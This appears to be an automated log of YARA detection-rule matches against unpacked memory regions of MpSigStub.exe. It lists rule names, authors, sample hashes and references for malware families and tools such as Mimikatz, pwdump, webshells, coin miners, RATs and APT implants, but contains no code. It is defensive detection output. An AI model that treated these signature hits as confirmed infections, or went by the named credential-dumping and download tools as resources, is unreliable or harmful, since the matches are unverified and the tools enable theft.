Source: 11.3.MpSigStub.exe.21b5e21e0f6.18.raw.unpack, type: UNPACKEDPE Matched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5e21e0f6.18.raw.unpack, type: UNPACKEDPE Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 11.3.MpSigStub.exe.21b5e61fb1a.216.raw.unpack, type: UNPACKEDPE Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 11.3.MpSigStub.exe.21b5fecf96e.186.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 11.3.MpSigStub.exe.21b5fecf96e.186.raw.unpack, type: UNPACKEDPE Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 11.3.MpSigStub.exe.21b5fecf96e.186.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 11.3.MpSigStub.exe.21b5ee7709e.60.raw.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 11.3.MpSigStub.exe.21b5f17d101.92.raw.unpack, type: UNPACKEDPE Matched rule: HackTool_Samples description = Hacktool, score =
Source: 11.3.MpSigStub.exe.21b5fb37126.10.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5fb37126.10.raw.unpack, type: UNPACKEDPE Matched rule: PUA_CryptoMiner_Jan19_1 date = 2019-01-31, hash1 = ede858683267c61e710e367993f5e589fcb4b4b57b09d023a67ea63084c54a05, author = Florian Roth, description = Detects Crypto Miner strings, reference = Internal Research
Source: 11.3.MpSigStub.exe.21b5f94bc01.210.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5f62017a.26.raw.unpack, type: UNPACKEDPE Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5f62017a.26.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_PDB_Strings_Keylogger_Backdoor date = 2018-03-23, author = Florian Roth, description = Detects PDB strings used in backdoors or keyloggers, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5fcdeb9e.86.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5e9002fe.65.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5e1d7add.180.raw.unpack, type: UNPACKEDPE Matched rule: XOR_4byte_Key date = 2015-12-15, author = Florian Roth, description = Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan), reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5fed0d72.115.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 11.3.MpSigStub.exe.21b5fed0d72.115.raw.unpack, type: UNPACKEDPE Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 11.3.MpSigStub.exe.21b5fed0d72.115.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 11.3.MpSigStub.exe.21b5e61fb1a.194.raw.unpack, type: UNPACKEDPE Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 11.3.MpSigStub.exe.21b5e1d6a89.179.raw.unpack, type: UNPACKEDPE Matched rule: XOR_4byte_Key date = 2015-12-15, author = Florian Roth, description = Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan), reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5fe6a936.114.raw.unpack, type: UNPACKEDPE Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 11.3.MpSigStub.exe.21b5fe6a936.114.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5fe6a936.114.raw.unpack, type: UNPACKEDPE Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: 11.3.MpSigStub.exe.21b5e7207f6.69.raw.unpack, type: UNPACKEDPE Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5fece56a.117.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 11.3.MpSigStub.exe.21b5fece56a.117.raw.unpack, type: UNPACKEDPE Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 11.3.MpSigStub.exe.21b5fece56a.117.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 11.3.MpSigStub.exe.21b5eec4df6.63.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5e61fb1a.149.unpack, type: UNPACKEDPE Matched rule: MAL_Turla_Agent_BTZ date = 2018-04-12, hash1 = c4a1cd6916646aa502413d42e6e7441c6e7268926484f19d9acbf5113fc52fc8, author = Florian Roth, description = Detects Turla Agent.BTZ, reference = https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5e61fb1a.149.unpack, type: UNPACKEDPE Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 11.3.MpSigStub.exe.21b5fef5492.85.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5f17da55.91.raw.unpack, type: UNPACKEDPE Matched rule: HackTool_Samples description = Hacktool, score =
Source: 11.3.MpSigStub.exe.21b5f293752.82.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 11.3.MpSigStub.exe.21b5f293752.82.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 11.3.MpSigStub.exe.21b5f293752.82.unpack, type: UNPACKEDPE Matched rule: SUSP_PDB_Path_Keywords date = 2019-10-04, author = Florian Roth, description = Detects suspicious PDB paths, reference = https://twitter.com/stvemillertime/status/1179832666285326337?s=20
Source: 11.3.MpSigStub.exe.21b5f293752.82.unpack, type: UNPACKEDPE Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 11.3.MpSigStub.exe.21b5f293752.82.unpack, type: UNPACKEDPE Matched rule: Greenbug_Malware_4 date = 2017-01-25, hash2 = 82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9, author = Florian Roth, description = Detects ISMDoor Backdoor, reference = https://goo.gl/urp4CD, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f
Source: 11.3.MpSigStub.exe.21b5e61fb1a.149.raw.unpack, type: UNPACKEDPE Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 11.3.MpSigStub.exe.21b5e61fb1a.194.unpack, type: UNPACKEDPE Matched rule: MAL_Turla_Agent_BTZ date = 2018-04-12, hash1 = c4a1cd6916646aa502413d42e6e7441c6e7268926484f19d9acbf5113fc52fc8, author = Florian Roth, description = Detects Turla Agent.BTZ, reference = https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5e61fb1a.194.unpack, type: UNPACKEDPE Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 11.3.MpSigStub.exe.21b5ee2f2ee.94.unpack, type: UNPACKEDPE Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 11.3.MpSigStub.exe.21b5fecf96e.116.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 11.3.MpSigStub.exe.21b5fecf96e.116.raw.unpack, type: UNPACKEDPE Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 11.3.MpSigStub.exe.21b5fecf96e.116.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 11.3.MpSigStub.exe.21b5f5daeae.24.unpack, type: UNPACKEDPE Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5f5daeae.24.unpack, type: UNPACKEDPE Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 11.3.MpSigStub.exe.21b5f5daeae.24.unpack, type: UNPACKEDPE Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 11.3.MpSigStub.exe.21b5f5daeae.24.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 11.3.MpSigStub.exe.21b5f5daeae.24.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5f94bc01.172.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5e1c2bca.202.raw.unpack, type: UNPACKEDPE Matched rule: APT_apt_duqu2_loaders copyright = Kaspersky Lab, description = Rule to detect Duqu 2.0 samples, version = 1.0, last_modified = 2015-06-09
Source: 11.3.MpSigStub.exe.21b5e1c2bca.202.raw.unpack, type: UNPACKEDPE Matched rule: apt_duqu2_loaders copyright = Kaspersky Lab, description = Rule to detect Duqu 2.0 samples, version = 1.0, last_modified = 2015-06-09
Source: 11.3.MpSigStub.exe.21b5ee7649a.62.raw.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 11.3.MpSigStub.exe.21b5e21ccf2.17.raw.unpack, type: UNPACKEDPE Matched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5e21ccf2.17.raw.unpack, type: UNPACKEDPE Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 11.3.MpSigStub.exe.21b5e61fb1a.206.unpack, type: UNPACKEDPE Matched rule: MAL_Turla_Agent_BTZ date = 2018-04-12, hash1 = c4a1cd6916646aa502413d42e6e7441c6e7268926484f19d9acbf5113fc52fc8, author = Florian Roth, description = Detects Turla Agent.BTZ, reference = https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5e61fb1a.206.unpack, type: UNPACKEDPE Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 11.3.MpSigStub.exe.21b5f56923e.105.raw.unpack, type: UNPACKEDPE Matched rule: Trojan_Win32_PlaKeylog_B author = Microsoft, description = Keylogger component, activity_group = Platinum, version = 1.0, unpacked_sample_sha1 = 6a1412daaa9bdc553689537df0a004d44f8a45fd, last_modified = 2016-04-12, original_sample_sha1 = 0096a3e0c97b85ca75164f48230ae530c94a2b77
Source: 11.3.MpSigStub.exe.21b5f56923e.105.raw.unpack, type: UNPACKEDPE Matched rule: APT_DNSpionage_Karkoff_Malware_Apr19_1 date = 2019-04-24, hash4 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, hash3 = 5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c, hash2 = b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04, hash1 = 6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11, author = Florian Roth, description = Detects DNSpionage Karkoff malware, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 11.3.MpSigStub.exe.21b5f56923e.105.raw.unpack, type: UNPACKEDPE Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 11.3.MpSigStub.exe.21b5f56923e.105.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_DropperBackdoor_Keywords date = 2019-04-24, hash1 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, author = Florian Roth, description = Detects suspicious keywords that indicate a backdoor, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 11.3.MpSigStub.exe.21b5f56923e.105.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3 date = 2019-04-13, hash3 = ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d, hash2 = 05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461, hash1 = 2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525, author = Florian Roth, description = Detects HOPLIGHT malware used by HiddenCobra APT group, reference = https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
Source: 11.3.MpSigStub.exe.21b5eec4df6.63.unpack, type: UNPACKEDPE Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 11.3.MpSigStub.exe.21b5eec4df6.63.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5eec4df6.63.unpack, type: UNPACKEDPE Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 11.3.MpSigStub.exe.21b5e21e0f6.18.unpack, type: UNPACKEDPE Matched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5e21e0f6.18.unpack, type: UNPACKEDPE Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 11.3.MpSigStub.exe.21b5ee77ca2.61.raw.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 11.3.MpSigStub.exe.21b5fb38b2a.11.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5fb38b2a.11.raw.unpack, type: UNPACKEDPE Matched rule: PUA_CryptoMiner_Jan19_1 date = 2019-01-31, hash1 = ede858683267c61e710e367993f5e589fcb4b4b57b09d023a67ea63084c54a05, author = Florian Roth, description = Detects Crypto Miner strings, reference = Internal Research
Source: 11.3.MpSigStub.exe.21b5eec4df6.95.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5fcdeb9e.188.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5fcdc99a.87.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5f94bc01.135.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5f3c65aa.44.raw.unpack, type: UNPACKEDPE Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 11.3.MpSigStub.exe.21b5f3c65aa.44.raw.unpack, type: UNPACKEDPE Matched rule: Derusbi_Kernel_Driver_WD_UDFS date = 2015-12-15, hash4 = e27fb16dce7fff714f4b05f2cef53e1919a34d7ec0e595f2eaa155861a213e59, hash3 = 6cdb65dbfb2c236b6d149fd9836cb484d0608ea082cf5bd88edde31ad11a0d58, hash2 = 50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a, author = Florian Roth, description = Detects Derusbi Kernel Driver, reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 1b449121300b0188ff9f6a8c399fb818d0cf53fd36cf012e6908a2665a27f016
Source: 11.3.MpSigStub.exe.21b5f3c65aa.44.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 11.3.MpSigStub.exe.21b5e4c313e.156.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 11.3.MpSigStub.exe.21b5e4c3d42.158.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 11.3.MpSigStub.exe.21b5ee2f2ee.94.raw.unpack, type: UNPACKEDPE Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 11.3.MpSigStub.exe.21b5ef9a849.112.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5ef9a849.112.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
